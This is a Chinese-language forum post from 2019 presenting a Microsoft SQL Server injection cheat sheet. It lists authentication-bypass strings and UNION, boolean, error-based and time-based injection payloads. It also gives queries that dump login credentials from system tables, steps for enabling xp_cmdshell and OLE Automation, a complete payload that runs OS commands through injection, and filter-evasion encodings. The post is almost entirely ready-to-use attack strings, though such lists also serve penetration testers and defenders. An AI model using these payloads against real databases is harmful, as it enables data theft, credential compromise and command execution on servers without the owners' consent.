默认数据库
注释
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password =''; SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
查询版本信息@@VERSION
SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE'%2008%';
查询数据库凭证Database..Table | master..syslogins, master..sysprocesses | | | | user, system_user, suser_sname(), is_srvrolemember('sysadmin') | | SELECT user, password FROM master.dbo.sysxlogins |
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID; SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE'0' END);
查询数据库信息
· SELECT DB_NAME(5); · SELECT name FROM master..sysdatabases;
查询主机名称
SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');
查询表和列
确定列数ORDER BY n+1;
漏洞语句: SELECT username, password, permission FROM UsersWHERE id = '1';
查询列数如下: 1' ORDER BY 1-- | True | 1' ORDER BY 2-- | True | 1' ORDER BY 3-- | True | 1' ORDER BY 4-- | False - Query is only using 3 columns | -1' UNION SELECT 1,2,3-- | True |
查询列GROUP BY / HAVING
漏洞语句: SELECT username,password, permission FROM Users WHERE id = '1'; 注入语句: 1' HAVING 1=1-- | Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. | 1' GROUP BY username HAVING 1=1-- | Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. | 1' GROUP BY username, password HAVING 1=1-- | Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. | 1' GROUP BY username, password, permission HAVING 1=1-- | No Error |
查询表
从以下两个数据库中查询表信息: information_schema.tables、master..sysobjects
联合查询UNION SELECT name FROM master..sysobjects WHERE xtype='U' |
布尔查询AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A' |
报错查询AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables) | AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) |
查询列从以下两个数据库中查询表信息: information_schema.columns 、 masters..syscolumns
联合查询UNION SELECT nameFROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHEREname = 'tablename')
布尔查询AND SELECT SUBSTRING(column_name,1,1) FROMinformation_schema.columns > 'A'
报错查询AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns) | AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) |
检索多个表/列1、 AND 1=0; BEGIN DECLARE @xy varchar(8000) SET@xy=':' SELECT @xy=@xy+' '+name FROMsysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END; 2、 AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROMTMP_DB);
3、 AND 1=0; DROP TABLE TMP_DB;
SQL Server 2005版本以上适用 SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('') |
储存过程查询: ' AND 1=0; DECLARE @S VARCHAR(4000) SET@S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--
避免单引号SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110) |
字符串拼接SELECT CONCAT('a','a','a'); (SQL SERVER 2012) | |
条件判断IF 1=1 SELECT'true' ELSE SELECT 'false'; SELECT CASE WHEN 1=1 THEN true ELSE false END;
时间注入WAITFOR DELAY 'time_to_pass'; WAITFOR TIME 'time_to_execute';
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFORDELAY '0:0:0';
执行命令EXEC master.dbo.xp_cmdshell 'cmd';
mssql 2005默认禁用xp_cmdshell,用以下语句开启: EXEC sp_configure 'show advanced options', 1 | EXEC sp_configure reconfigure | EXEC sp_configure 'xp_cmdshell', 1 | EXEC sp_configure reconfigure |
调用wscript执行命令: DECLARE @execmd INT | EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT | EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c echo jumbo' |
如果版本高于sql 2000,需要执行其他查询才能执行上一条命令:
EXEC sp_configure 'show advanced options', 1 | EXEC sp_configure reconfigure | EXEC sp_configure 'OLE Automation Procedures', 1 | EXEC sp_configure reconfigure |
例: 1、把命令结果存入tmp_db ' IF EXISTS (SELECT 1 FROMINFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE@a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id(N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGINCREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_valueint, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGINCREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXECmaster..xp_cmdshell 'dir' SELECT @a='' SELECT@a=Replace(@a%2B'<br></font><fontcolor="black">'%2Bdir,'<dir>','</font><fontcolor="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23DataEND ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSESELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB-- 2、从tmp_db查询内容: ' UNION SELECT tbl FROM TMP_DB--
3、删除tmp_db ' DROP TABLE TMP_DB--
多语句查询' AND 1=0 INSERT INTO ([column1], [column2]) VALUES('value1', 'value2');
混淆以下字符等同于空
S%E%L%E%C%T%01column%02FROM%03table; A%%ND 1=%%%%%%%%1; %仅限于ASP(x)环境
以下字符代替空格
UNION(SELECT(column)FROM(table)); SELECT"table_name"FROM[information_schema].[tables];
and/or之后可以使用的符号
SELECT 1FROMWHERE\1=\1AND\1=\1;
编码[table=98%]
URL Encoding SELECT %74able_%6eame FROM information_schema.tables;
SELECT %2574able_%256eame FROM information_schema.tables;
SELECT %u0074able_%u6eame FROM information_schema.tables;
Invalid Hex Encoding (ASP) SELECT %tab%le_%na%me FROM information_schema.tables;
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--
HTML Entities (Needs to be verified) %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B
| 
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2019-11-6 20:06:57
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡